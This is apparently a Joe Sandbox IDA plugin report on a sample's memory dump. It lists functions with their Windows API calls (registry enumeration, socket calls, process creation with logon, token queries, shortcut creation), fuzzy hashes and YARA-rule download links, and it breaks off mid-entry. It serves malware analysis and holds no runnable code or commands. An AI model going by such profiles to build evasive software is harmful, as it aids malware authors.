Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: 683a607a79a554e7f3f99b7cf8e32f641d0644f33c40c797d519e14634b40307
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: D711C671981B04BADA21BFB0CC46FDB7B9EEF05700F404825F29AA65D2DB79A5058B70

Function 00DBDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00DBDA74
LoadStringW.USER32(00000000), ref: 00DBDA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00DBDA91
LoadStringW.USER32(00000000), ref: 00DBDA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DBDADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00DBDAB9

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 907d67ade556806b4e1ea2f7aa033bf6e94f21128abf07c3aa4ffa31cd4e1b50
Instruction ID: 5e9c4b052f42c0916d0458e2934551e5328fdca8fd87a1d06b3e3fb67ae777a3
Opcode Fuzzy Hash: 907d67ade556806b4e1ea2f7aa033bf6e94f21128abf07c3aa4ffa31cd4e1b50
Instruction Fuzzy Hash: 3A0181F2910348BFEB10BBA09DC9EEB736CEB08305F401496B756E6141EA749E858F74

Function 00DC096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(0176E0C8,0176E0C8), ref: 00DC097B
EnterCriticalSection.KERNEL32(0176E0A8,00000000), ref: 00DC098D
TerminateThread.KERNEL32(?,000001F6), ref: 00DC099B
WaitForSingleObject.KERNEL32(?,000003E8), ref: 00DC09A9
CloseHandle.KERNEL32(?), ref: 00DC09B8
InterlockedExchange.KERNEL32(0176E0C8,000001F6), ref: 00DC09C8
LeaveCriticalSection.KERNEL32(0176E0A8), ref: 00DC09CF

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: f9df1816708dbe169e95656d9ed71d8b0b811d500126de6e6fa0006f42d78ffb
Instruction ID: 757e0f0dbd6953e158bb64eac5eb59a6ad6c3997da4e3c117f2fa5cbf18663e0
Opcode Fuzzy Hash: f9df1816708dbe169e95656d9ed71d8b0b811d500126de6e6fa0006f42d78ffb
Instruction Fuzzy Hash: 45F01D31552742EBD7416B94EEC8BD67A29BF01702F842015F201999A0CB749466CFB4

Function 00DD1C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00DD1DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00DD1DE1
WSAGetLastError.WSOCK32 ref: 00DD1DF2
htons.WSOCK32(?,?,?,?,?), ref: 00DD1EDB
inet_ntoa.WSOCK32(?), ref: 00DD1E8C

Part of subcall function 00DB39E8: _strlen.LIBCMT ref: 00DB39F2

Part of subcall function 00DD3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00DCEC0C), ref: 00DD3240

_strlen.LIBCMT ref: 00DD1F35

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 57def0a1546c3f6f08b0de6857b8a0aa5507791f6e2d632ce5c048192c85b9bc
Instruction ID: 91aca518736a7cbd4c8d01b1d3dcc5b8a8e40e2bdc75fe2d895ff418601842bf
Opcode Fuzzy Hash: 57def0a1546c3f6f08b0de6857b8a0aa5507791f6e2d632ce5c048192c85b9bc
Instruction Fuzzy Hash: 0AB1AF35204340AFC724DF24C895E2ABBA5EF84318F58894DF8565B3A2DB71ED46CBB1

Function 00D801B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00D800BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D800D6
__allrem.LIBCMT ref: 00D800ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D8010B
__allrem.LIBCMT ref: 00D80122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D80140

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 1d55790ed87d7fc4268450c26ff2f752939ca319dd14f20b3e176d85012dd1f6
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 5881E6766007069FE720AF68CC41B6AB7E9EF41734F28853AF555D6281EB70D9048BB0

Function 00D861FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D782D9,00D782D9,?,?,?,00D8644F,00000001,00000001,8BE85006), ref: 00D86258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D8644F,00000001,00000001,8BE85006,?,?,?), ref: 00D862DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D863D8
__freea.LIBCMT ref: 00D863E5

Part of subcall function 00D83820: RtlAllocateHeap.NTDLL(00000000,?,00E21444,?,00D6FDF5,?,?,00D5A976,00000010,00E21440,00D513FC,?,00D513C6,?,00D51129), ref: 00D83852

__freea.LIBCMT ref: 00D863EE
__freea.LIBCMT ref: 00D86413

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 6b586866f7091c967702e5322f95a5b25cc2a309b1ce13d7a2094d067d74b4e1
Instruction ID: 64eb7785d345388dfc3f44ee98af13390d49faa87220879d1692ae5eefd5c400
Opcode Fuzzy Hash: 6b586866f7091c967702e5322f95a5b25cc2a309b1ce13d7a2094d067d74b4e1
Instruction Fuzzy Hash: 9451B172600216ABEB25AF64DC81EBF77AAEB44B60F1D4669FC05D6140EB34DC54C770

Function 00DDBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD

Part of subcall function 00DDC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DDB6AE,?,?), ref: 00DDC9B5
Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDC9F1
Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDCA68
Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDCA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DDBCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DDBD25
RegCloseKey.ADVAPI32(00000000), ref: 00DDBD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00DDBD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00DDBDF3
RegCloseKey.ADVAPI32(?), ref: 00DDBDFF

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 2fb0959092fd3b851b74e1c2fc5d2c13d0c44adefe9519320d4b26f8331f8c2f
Instruction ID: 48e6494dfcdbba07f3badee41bda5920edd467abf63549df4fbaec38d72a80d2
Opcode Fuzzy Hash: 2fb0959092fd3b851b74e1c2fc5d2c13d0c44adefe9519320d4b26f8331f8c2f
Instruction Fuzzy Hash: AD816E30118241EFD714DF24C895E2ABBE5FF84318F15495EF8968B2A2DB31ED45CBA2

Function 00DAF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 00DAF7B9
SysAllocString.OLEAUT32(00000001), ref: 00DAF860
VariantCopy.OLEAUT32(00DAFA64,00000000), ref: 00DAF889
VariantClear.OLEAUT32(00DAFA64), ref: 00DAF8AD
VariantCopy.OLEAUT32(00DAFA64,00000000), ref: 00DAF8B1
VariantClear.OLEAUT32(?), ref: 00DAF8BB

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: b323af777c5a5abb853cbb074dcc7849eedf3ebf4f618773fdc43fc0799be1bd
Instruction ID: 2e359096ef1e8296f2bdaeee60ead2d3d05aad763a5bdaf61dcf3fbe77e67b3d
Opcode Fuzzy Hash: b323af777c5a5abb853cbb074dcc7849eedf3ebf4f618773fdc43fc0799be1bd
Instruction Fuzzy Hash: 9051B632500310ABCF24ABA5D895B2EB3A4EF46310F2458A6EC05DF291DB74DC41CBB6

Function 00DC910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00D57620: _wcslen.LIBCMT ref: 00D57625

Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 00DC94E5
_wcslen.LIBCMT ref: 00DC9506
_wcslen.LIBCMT ref: 00DC952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00DC9585

Strings

X, xrefs: 00DC9412

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 6809058041ec8cdf2800253967ab66891bcdeaecf3f8cefe0a31daf341119f7a
Instruction ID: 44c9d4535e5495af856743e89d1dbb90d65a28fa57b24fb11cd46127feea7167
Opcode Fuzzy Hash: 6809058041ec8cdf2800253967ab66891bcdeaecf3f8cefe0a31daf341119f7a
Instruction Fuzzy Hash: 20E16C315083418FDB14DF24C895B6AB7E4FF85314F18896DE8999B2A2EB31DD05CBB2

Function 00D6920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2

BeginPaint.USER32(?,?,?), ref: 00D69241
GetWindowRect.USER32(?,?), ref: 00D692A5
ScreenToClient.USER32(?,?), ref: 00D692C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00D692D3
EndPaint.USER32(?,?,?,?,?), ref: 00D69321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00DA71EA

Part of subcall function 00D69339: BeginPath.GDI32(00000000), ref: 00D69357

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: bbe59637f746425fee1ac5dd658619885684867f41f99c0407612337f1475b47
Instruction ID: edbddc9e2ef42afc3db044b45da36b69593c46ac179b914657322c90de38a24e
Opcode Fuzzy Hash: bbe59637f746425fee1ac5dd658619885684867f41f99c0407612337f1475b47
Instruction Fuzzy Hash: C041AE70104340AFD721DF25DCA4FAABBA8EB9A320F040669F995DB2A1C7309946DB71

Function 00DC07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00DC080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00DC0847
EnterCriticalSection.KERNEL32(?), ref: 00DC0863
LeaveCriticalSection.KERNEL32(?), ref: 00DC08DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00DC08F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00DC0921

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 117cf74eac8b7466fe0740faa50e10b465558523433582823edb3c24b80333c7
Instruction ID: 4d988c9a1988c00d5c68bbe57751b524c2bd2938a23b60a57660fdb30e142364
Opcode Fuzzy Hash: 117cf74eac8b7466fe0740faa50e10b465558523433582823edb3c24b80333c7
Instruction Fuzzy Hash: 1B413871900205EBDF14AF54DC85AAA7BB8FF04310B1480A9E904AF297DB31DE65DBB4

Function 00DE81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00DAF3AB,00000000,?,?,00000000,?,00DA682C,00000004,00000000,00000000), ref: 00DE824C
EnableWindow.USER32(?,00000000), ref: 00DE8272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00DE82D1
ShowWindow.USER32(?,00000004), ref: 00DE82E5
EnableWindow.USER32(?,00000001), ref: 00DE830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00DE832F

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 9b919538a6bae4043748f840f96a556a0b8cc2d1405cf964b13dad4fb58c1ed4
Instruction ID: 825fc59928a8278142d85e39dfb993634088070825b7c4cf6d213f509f809ad0
Opcode Fuzzy Hash: 9b919538a6bae4043748f840f96a556a0b8cc2d1405cf964b13dad4fb58c1ed4
Instruction Fuzzy Hash: A241D730601680AFDB25EF16C895BE47BE0FB46715F1C11A8E60C9F272C7325846DB74

Function 00DB4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00DB4C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00DB4CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00DB4CEA
_wcslen.LIBCMT ref: 00DB4D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00DB4D10
_wcsstr.LIBVCRUNTIME ref: 00DB4D1A

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 1952873d52a83ea3119b22cba2428587e344e645b99602ac5b0eed81f8661b28
Instruction ID: c310a953810a0b85fc78940a775383c05f50ad105b238d6283557fb8d43d7f19
Opcode Fuzzy Hash: 1952873d52a83ea3119b22cba2428587e344e645b99602ac5b0eed81f8661b28
Instruction Fuzzy Hash: 8D21CC72604240BBEB159B35EC45EBB7FACDF45750F14802DF80ACA193EA61DC4196B0

Function 00DC581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00D53AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D53A97,?,?,00D52E7F,?,?,?,00000000), ref: 00D53AC2

_wcslen.LIBCMT ref: 00DC587B
CoInitialize.OLE32(00000000), ref: 00DC5995
CoCreateInstance.OLE32(00DEFCF8,00000000,00000001,00DEFB68,?), ref: 00DC59AE
CoUninitialize.OLE32 ref: 00DC59CC

Strings

.lnk, xrefs: 00DC5876, 00DC58C1, 00DC5985

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: cd50a6a33cb2ea7675c03b47444924566ca7d003c79b519bdd6c51affb8ed04c
Instruction ID: d37861dc72a40697bad76cd1894dc628f9d5d80da316113b522dd0fe2cb37088
Opcode Fuzzy Hash: cd50a6a33cb2ea7675c03b47444924566ca7d003c79b519bdd6c51affb8ed04c
Instruction Fuzzy Hash: 03D155756047029FCB14DF14D480E2ABBE2EF89714F14899DF8899B361DB31ED85CBA2

Function 00DB175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00DB0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DB0FCA
Part of subcall function 00DB0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DB0FD6
Part of subcall function 00DB0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DB0FE5
Part of subcall function 00DB0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00DB0FEC
Part of subcall function 00DB0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DB1002

GetLengthSid.ADVAPI32(?,00000000,00DB1335), ref: 00DB17AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00DB17BA
HeapAlloc.KERNEL32(00000000), ref: 00DB17C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 00DB17DA
GetProcessHeap.KERNEL32(00000000,00000000,00DB1335), ref: 00DB17EE
HeapFree.KERNEL32(00000000), ref: 00DB17F5

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 0ab814228c6f585150b7de7d45a260898d654958581c4feed0c02501ea22ee49
Instruction ID: e71ab966bfea2f59b4d89bd4095f148d68cf5fec1b93c9759020673a7ef8e3d8
Opcode Fuzzy Hash: 0ab814228c6f585150b7de7d45a260898d654958581c4feed0c02501ea22ee49
Instruction Fuzzy Hash: C5116A36A10305EBDB10AFA4CC99BEE7BA9FB46355F944018F882DB210DB35A945CB70

Function 00DB14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00DB14FF
OpenProcessToken.ADVAPI32(00000000), ref: 00DB1506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00DB1515
CloseHandle.KERNEL32(00000004), ref: 00DB1520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DB154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00DB1563

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
